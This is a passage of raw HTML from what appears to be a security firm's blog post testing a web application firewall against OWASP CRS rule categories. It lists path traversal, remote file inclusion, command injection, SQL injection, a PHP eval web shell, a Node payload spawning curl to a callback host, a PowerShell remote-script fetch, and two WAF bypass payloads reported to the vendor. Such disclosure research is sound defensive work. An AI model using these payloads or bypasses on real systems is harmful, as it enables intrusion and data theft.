&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_2ef0ceff13de4de4bef646fec06594d3-1" name="rest_code_2ef0ceff13de4de4bef646fec06594d3-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_2ef0ceff13de4de4bef646fec06594d3-1"&gt;&lt;/a&gt;GET /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2 HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-1" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-1"&gt;&lt;/a&gt;POST / HTTP/1.1
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-2" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-2"&gt;&lt;/a&gt;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-3" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-3"&gt;&lt;/a&gt;Content-Type: application/x-www-form-urlencoded
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-4" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-4"&gt;&lt;/a&gt;Host: www.example.org
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-5" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-5" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-5"&gt;&lt;/a&gt;Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-6" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-6" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-6"&gt;&lt;/a&gt;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-7" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-7" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-7"&gt;&lt;/a&gt;Content-Length: 86
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-8" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-8" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-8"&gt;&lt;/a&gt;
&lt;a id="rest_code_c32a7b5b69ec44ac823839456e8221ba-9" name="rest_code_c32a7b5b69ec44ac823839456e8221ba-9" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_c32a7b5b69ec44ac823839456e8221ba-9"&gt;&lt;/a&gt;foo=(%26(objectCategory=computer)%20(userAccountControl:1.2.840.113556.1.4.803:=8192))
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-930-application-attack-lfi"&gt;
&lt;h3&gt;REQUEST-930-APPLICATION-ATTACK-LFI&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_76b8269e4c2142f8921b57fa176e3dd7-1" name="rest_code_76b8269e4c2142f8921b57fa176e3dd7-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_76b8269e4c2142f8921b57fa176e3dd7-1"&gt;&lt;/a&gt;GET /?foo=.../.../WINDOWS/win.ini HTTP/1.1
&lt;a id="rest_code_76b8269e4c2142f8921b57fa176e3dd7-2" name="rest_code_76b8269e4c2142f8921b57fa176e3dd7-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_76b8269e4c2142f8921b57fa176e3dd7-2"&gt;&lt;/a&gt;GET /?foo=0x5c0x2e./0x5c0x2e./0x5c0x2e./0x5c0x2e./0x5c0x2e./ HTTP/1.1
&lt;a id="rest_code_76b8269e4c2142f8921b57fa176e3dd7-3" name="rest_code_76b8269e4c2142f8921b57fa176e3dd7-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_76b8269e4c2142f8921b57fa176e3dd7-3"&gt;&lt;/a&gt;GET /foo../1234 HTTP/1.1
&lt;a id="rest_code_76b8269e4c2142f8921b57fa176e3dd7-4" name="rest_code_76b8269e4c2142f8921b57fa176e3dd7-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_76b8269e4c2142f8921b57fa176e3dd7-4"&gt;&lt;/a&gt;GET /?a=..;.\.;\. HTTP/1.1
&lt;a id="rest_code_76b8269e4c2142f8921b57fa176e3dd7-5" name="rest_code_76b8269e4c2142f8921b57fa176e3dd7-5" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_76b8269e4c2142f8921b57fa176e3dd7-5"&gt;&lt;/a&gt;GET /?code=;+cat+%2Fetc%2Fsubuid+%23 HTTP/1.1
&lt;a id="rest_code_76b8269e4c2142f8921b57fa176e3dd7-6" name="rest_code_76b8269e4c2142f8921b57fa176e3dd7-6" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_76b8269e4c2142f8921b57fa176e3dd7-6"&gt;&lt;/a&gt;GET /?code=;echo+fooffff&amp;gt;/tmp/curl HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-931-application-attack-rfi"&gt;
&lt;h3&gt;REQUEST-931-APPLICATION-ATTACK-RFI&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-1" name="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_81f32c85d7f34311a4ecd0b28dc64f99-1"&gt;&lt;/a&gt;GET /?src=http://66.240.183.75/crash.php HTTP/1.1
&lt;a id="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-2" name="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_81f32c85d7f34311a4ecd0b28dc64f99-2"&gt;&lt;/a&gt;GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar HTTP/1.1
&lt;a id="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-3" name="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_81f32c85d7f34311a4ecd0b28dc64f99-3"&gt;&lt;/a&gt;GET /?x=https://example.com/ HTTP/1.1
&lt;a id="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-4" name="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_81f32c85d7f34311a4ecd0b28dc64f99-4"&gt;&lt;/a&gt;GET /?x=url:file://foo.bar HTTP/1.1
&lt;a id="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-5" name="rest_code_81f32c85d7f34311a4ecd0b28dc64f99-5" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_81f32c85d7f34311a4ecd0b28dc64f99-5"&gt;&lt;/a&gt;GET /file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-932-application-attack-rce"&gt;
&lt;h3&gt;REQUEST-932-APPLICATION-ATTACK-RCE&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-1" name="rest_code_a93846228fec48e7aaf4bda63571b847-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-1"&gt;&lt;/a&gt;GET /get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1 HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-2" name="rest_code_a93846228fec48e7aaf4bda63571b847-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-2"&gt;&lt;/a&gt;GET /get?a=Invoke-Expression%20-Command%20file.ps1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-3" name="rest_code_a93846228fec48e7aaf4bda63571b847-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-3"&gt;&lt;/a&gt;GET /get?cmd=%3Biwr%20http://example.com/path/file.ps1 HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-4" name="rest_code_a93846228fec48e7aaf4bda63571b847-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-4"&gt;&lt;/a&gt;GET /?cmd=cat%20/etc/pa%5Bs%5Dswd HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-5" name="rest_code_a93846228fec48e7aaf4bda63571b847-5" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-5"&gt;&lt;/a&gt;GET /?cmd=x&amp;lt;cat+/etc/pa%5Bs%5Dswd HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-6" name="rest_code_a93846228fec48e7aaf4bda63571b847-6" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-6"&gt;&lt;/a&gt;GET /?cmd=;cat+/etc/pas[s]wd HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-7" name="rest_code_a93846228fec48e7aaf4bda63571b847-7" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-7"&gt;&lt;/a&gt;GET /?s=;/usr/bin/%5Bu%5Dname+-a HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-8" name="rest_code_a93846228fec48e7aaf4bda63571b847-8" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-8"&gt;&lt;/a&gt;GET /?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-9" name="rest_code_a93846228fec48e7aaf4bda63571b847-9" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-9"&gt;&lt;/a&gt;GET /?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-10" name="rest_code_a93846228fec48e7aaf4bda63571b847-10" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-10"&gt;&lt;/a&gt;GET /?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-11" name="rest_code_a93846228fec48e7aaf4bda63571b847-11" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-11"&gt;&lt;/a&gt;GET /?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29 HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-12" name="rest_code_a93846228fec48e7aaf4bda63571b847-12" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-12"&gt;&lt;/a&gt;GET /?x=%2Fusr%2Fbin%2Fperl+-e+%27print+readline%27+some-file.txt HTTP/1.1
&lt;a id="rest_code_a93846228fec48e7aaf4bda63571b847-13" name="rest_code_a93846228fec48e7aaf4bda63571b847-13" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_a93846228fec48e7aaf4bda63571b847-13"&gt;&lt;/a&gt;GET /?x=)};%24SHELL%20-c%20%22echo%20hi%22 HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-933-application-attack-php"&gt;
&lt;h3&gt;REQUEST-933-APPLICATION-ATTACK-PHP&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_66b07da4b1154804a77d9f9a13fed49d-1" name="rest_code_66b07da4b1154804a77d9f9a13fed49d-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_66b07da4b1154804a77d9f9a13fed49d-1"&gt;&lt;/a&gt;GET /?x=$_SERVER['test']; HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;File content:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_276bb92a80574dcdb48b21a22f215ddf-1" name="rest_code_276bb92a80574dcdb48b21a22f215ddf-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_276bb92a80574dcdb48b21a22f215ddf-1"&gt;&lt;/a&gt;&amp;lt;?php @eval($_POST["hacker"]); ?&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-934-application-attack-generic"&gt;
&lt;h3&gt;REQUEST-934-APPLICATION-ATTACK-GENERIC&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-1" name="rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-1"&gt;&lt;/a&gt;GET /get/?foo=eval%28String.fromCharCode HTTP/1.1
&lt;a id="rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-2" name="rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-2"&gt;&lt;/a&gt;GET /get/?foo=%0Arequire("child_process").exec('whoami') HTTP/1.1
&lt;a id="rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-3" name="rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_baea0d3d592d44c88ecaeecbbd6f30b8-3"&gt;&lt;/a&gt;GET /?x=%0Arequire%3bx%3d"child_process"%3blol(x).spawn("curl",%20['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-942-application-attack-sqli"&gt;
&lt;h3&gt;REQUEST-942-APPLICATION-ATTACK-SQLI&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-1" name="rest_code_cec85265392844bfbbf036eb8766ade2-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-1"&gt;&lt;/a&gt;GET /?a=b,1=1 HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-2" name="rest_code_cec85265392844bfbbf036eb8766ade2-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-2"&gt;&lt;/a&gt;GET /?a=a=42%20like%2042 HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-3" name="rest_code_cec85265392844bfbbf036eb8766ade2-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-3"&gt;&lt;/a&gt;GET /?a=1%20is%20not%202 HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-4" name="rest_code_cec85265392844bfbbf036eb8766ade2-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-4"&gt;&lt;/a&gt;GET /?a=%271%27+not+regexp+%272%27 HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-5" name="rest_code_cec85265392844bfbbf036eb8766ade2-5" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-5"&gt;&lt;/a&gt;GET /?var=,+FIND_IN_SET('22',+Category+) HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-6" name="rest_code_cec85265392844bfbbf036eb8766ade2-6" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-6"&gt;&lt;/a&gt;GET /?var==1'+%2b+1+is+likelihood(0.0,0.0)+is+1-- HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-7" name="rest_code_cec85265392844bfbbf036eb8766ade2-7" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-7"&gt;&lt;/a&gt;GET /?var==1'+%2b+starts_with(password,'a')::int HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-8" name="rest_code_cec85265392844bfbbf036eb8766ade2-8" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-8"&gt;&lt;/a&gt;GET /?id=...(json_build_object(1,password)::jsonb)::int HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-9" name="rest_code_cec85265392844bfbbf036eb8766ade2-9" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-9"&gt;&lt;/a&gt;GET /?var=SELECT%20x%20GROUP%20BY%20SOMETHING%20HAVING%20COUNT%28Id%29%20%3E%3D%209 HTTP/1.1
&lt;a id="rest_code_cec85265392844bfbbf036eb8766ade2-10" name="rest_code_cec85265392844bfbbf036eb8766ade2-10" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_cec85265392844bfbbf036eb8766ade2-10"&gt;&lt;/a&gt;GET /?var=;INSERT+INTO+table+(col)+VALUES+1,2,3 HTTP/1.1
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;section id="request-944-application-attack-java"&gt;
&lt;h3&gt;REQUEST-944-APPLICATION-ATTACK-JAVA&lt;/h3&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_b7a1bd6733384ddeb2c55aefc852723f-1" name="rest_code_b7a1bd6733384ddeb2c55aefc852723f-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_b7a1bd6733384ddeb2c55aefc852723f-1"&gt;&lt;/a&gt;java.lang.ProcessBuilder
&lt;a id="rest_code_b7a1bd6733384ddeb2c55aefc852723f-2" name="rest_code_b7a1bd6733384ddeb2c55aefc852723f-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_b7a1bd6733384ddeb2c55aefc852723f-2"&gt;&lt;/a&gt;java.lang.Runtime
&lt;a id="rest_code_b7a1bd6733384ddeb2c55aefc852723f-3" name="rest_code_b7a1bd6733384ddeb2c55aefc852723f-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_b7a1bd6733384ddeb2c55aefc852723f-3"&gt;&lt;/a&gt;java.io.BufferedInputStream
&lt;/pre&gt;&lt;/div&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="bypassing-both-wafs"&gt;
&lt;h2&gt;Bypassing both WAFs&lt;/h2&gt;
&lt;p&gt;There was one more thing we wanted to do. We wanted to find something that bypasses both WAFs.&lt;/p&gt;
&lt;section id="php"&gt;
&lt;h3&gt;PHP&lt;/h3&gt;
&lt;p&gt;After looking at the PHP regex of rules for CRS, we came up with the following valid PHP payload:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_29e379b4478940c394eb52cdab60e5eb-1" name="rest_code_29e379b4478940c394eb52cdab60e5eb-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_29e379b4478940c394eb52cdab60e5eb-1"&gt;&lt;/a&gt;&amp;lt;?xml :system("ls")
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This is valid PHP code with the short PHP start tag (&amp;lt;?) that executes a shell command, but bypasses the filter rules for both WAFs. PHP will interprete the "xml :" part as a label (e.g. used for goto).&lt;/p&gt;
&lt;p&gt;OWASP CRS checked for the short PHP start tag (&amp;lt;?) but excluded &amp;lt;?xml generically, which allowed the bypass. However, for CRS other rules such as Cross-Site Scripting prevention rules also triggered (multi-layer approach), meaning depending on the filter settings the payload could still be detected in some cases. After reporting the &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/issues/3616"&gt;PHP filter bypass to OWASP CRS it was fixed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Although Airlock also has a rule to detect PHP short start tag payloads, for Airlock this payload resulted in a bypass.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="xml"&gt;
&lt;h3&gt;XML&lt;/h3&gt;
&lt;p&gt;To find a second bypass we simply used a payload from one of our &lt;a class="reference external" href="https://www.pentagrid.ch/de/blog/reflected-xss-vulnerability-in-crealogix-ebics-implementation/"&gt;old advisories that hides the Cross-side Scripting payload in an XML attribute&lt;/a&gt; :&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-1" name="rest_code_313e8462ce9641868a3fb75914512cae-1" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-1"&gt;&lt;/a&gt;POST /ebics-server/ebics.aspx HTTP/1.1
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-2" name="rest_code_313e8462ce9641868a3fb75914512cae-2" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-2"&gt;&lt;/a&gt;Content-Type: text/xml; charset=UTF-8
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-3" name="rest_code_313e8462ce9641868a3fb75914512cae-3" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-3"&gt;&lt;/a&gt;Host: www.example.org
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-4" name="rest_code_313e8462ce9641868a3fb75914512cae-4" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-4"&gt;&lt;/a&gt;Content-Length: 585
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-5" name="rest_code_313e8462ce9641868a3fb75914512cae-5" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-5"&gt;&lt;/a&gt;Connection: close
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-6" name="rest_code_313e8462ce9641868a3fb75914512cae-6" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-6"&gt;&lt;/a&gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-7" name="rest_code_313e8462ce9641868a3fb75914512cae-7" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-7"&gt;&lt;/a&gt;&amp;lt;?xml version="1.0" encoding="utf-8" standalone="no"?&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-8" name="rest_code_313e8462ce9641868a3fb75914512cae-8" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-8"&gt;&lt;/a&gt;&amp;lt;ebicsUnsecuredRequest xmlns="urn:org:ebics:H004" Revision="1" Version="&amp;amp;lt;a autofocus onfocus=print(1) href&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;;"&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-9" name="rest_code_313e8462ce9641868a3fb75914512cae-9" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-9"&gt;&lt;/a&gt;    &amp;lt;header authenticate="true"&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-10" name="rest_code_313e8462ce9641868a3fb75914512cae-10" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-10"&gt;&lt;/a&gt;        &amp;lt;static&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-11" name="rest_code_313e8462ce9641868a3fb75914512cae-11" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-11"&gt;&lt;/a&gt;            &amp;lt;HostID&amp;gt;AAA&amp;lt;/HostID&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-12" name="rest_code_313e8462ce9641868a3fb75914512cae-12" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-12"&gt;&lt;/a&gt;            &amp;lt;PartnerID&amp;gt;AAA&amp;lt;/PartnerID&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-13" name="rest_code_313e8462ce9641868a3fb75914512cae-13" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-13"&gt;&lt;/a&gt;            &amp;lt;UserID&amp;gt;AAA&amp;lt;/UserID&amp;gt;
